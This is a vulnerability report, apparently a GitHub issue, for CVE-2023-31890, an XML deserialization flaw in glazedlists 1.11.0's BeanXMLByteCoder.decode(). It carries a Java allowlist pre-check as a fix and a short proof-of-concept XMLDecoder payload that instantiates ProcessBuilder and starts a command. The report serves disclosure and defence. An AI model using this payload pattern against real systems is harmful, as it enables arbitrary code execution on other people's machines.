CVE-2023-31890: XML Deserialization vulnerability in BeanXMLByteCoder · Issue #709 · glazedlists/glazedlists

An XML Deserialization vulnerability in glazedlists v1.11.0 allows an attacker to execute arbitrary code via the BeanXMLByteCoder.decode() parameter.


Vulnerability location: ca.odell.glazedlists.impl.io.BeanXMLByteCoder

The BeanXMLByteCoder class provides a decode() method that decodes an Object from an InputStream.

When decode() is called, the program passes the input straight to XMLDecoder.readObject() without any validation of the XML, which causes an XML deserialization vulnerability: XMLDecoder instantiates whatever classes and invokes whatever methods the document names.

ca.odell.glazedlists.impl.io.BeanXMLByteCoder#decode
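As an added illustration (not part of the report and not glazedlists code), the hypothetical GuardedBeanXmlDecoder below shows the check that is missing on the decode() path described above: the bean XML is first parsed with a hardened DOM parser, and every class attribute (on object, array and void elements) and every method attribute is compared against an application allowlist before XMLDecoder.readObject() is allowed to run. The allowlist contents, including com.example.app.Customer, are placeholders, and the code assumes Java 11 or later for Set.of and InputStream.readAllBytes.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Set;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

/** Hypothetical guarded replacement for an unchecked XMLDecoder.readObject() call. */
public final class GuardedBeanXmlDecoder {

    // Placeholder allowlist: the bean types the application actually serializes.
    private static final Set<String> ALLOWED_CLASSES = Set.of(
            "java.lang.String", "java.lang.Integer", "java.util.ArrayList",
            "com.example.app.Customer");

    // Placeholder allowlist of <void method="..."> calls; XMLEncoder emits "add"
    // for collections. Anything else (e.g. "start") is refused.
    private static final Set<String> ALLOWED_METHODS = Set.of("add");

    public static Object decode(InputStream in) throws IOException {
        byte[] xml = in.readAllBytes();
        rejectUnexpectedClasses(xml);           // the check the vulnerable path lacks
        try (XMLDecoder decoder = new XMLDecoder(new ByteArrayInputStream(xml))) {
            return decoder.readObject();
        }
    }

    static void rejectUnexpectedClasses(byte[] xml) throws IOException {
        try {
            DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
            // Hardened parser: no DOCTYPE, no entity expansion, so the pre-check
            // itself cannot be abused (XXE, entity bombs).
            f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            f.setExpandEntityReferences(false);
            DocumentBuilder b = f.newDocumentBuilder();
            Document doc = b.parse(new ByteArrayInputStream(xml));
            NodeList all = doc.getElementsByTagName("*");
            for (int i = 0; i < all.getLength(); i++) {
                Element e = (Element) all.item(i);
                String cls = e.getAttribute("class");   // "" when absent
                if (!cls.isEmpty() && !ALLOWED_CLASSES.contains(cls)) {
                    throw new IOException("refusing to decode: class not allowlisted: " + cls);
                }
                String method = e.getAttribute("method");
                if (!method.isEmpty() && !ALLOWED_METHODS.contains(method)) {
                    throw new IOException("refusing to decode: method not allowlisted: " + method);
                }
            }
        } catch (ParserConfigurationException | SAXException ex) {
            throw new IOException("malformed bean XML", ex);
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed benign input, the shape XMLEncoder produces for a String.
        String benign = "<java><string>hello</string></java>";
        System.out.println(decode(new ByteArrayInputStream(benign.getBytes(StandardCharsets.UTF_8))));

        // Constructed input naming a class outside the allowlist: rejected before
        // XMLDecoder ever sees it, so nothing is instantiated.
        String hostile = "<java><object class=\"java.lang.ProcessBuilder\"/></java>";
        try {
            decode(new ByteArrayInputStream(hostile.getBytes(StandardCharsets.UTF_8)));
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist is the whole defence, so it should be generated from the bean types the application really writes with XMLEncoder rather than guessed. Where the input is genuinely untrusted, a format that cannot express class names or method calls at all is the stronger choice; the pre-check above is the minimal fix for code that must keep XMLDecoder.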

Attack payload:

    <java>
      <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
          <void index="0"><string>calc</string></void>
        </array>
        <void method="start"></void>
      </object>
    </java>

A small test program reproduces the issue.

OS: Windows 10
JDK: 1.8.0_111
glazedlists: 1.11.0

Related news

GHSA-p6m6-9j36-vfjx: glazedlists XML Deserialization vulnerability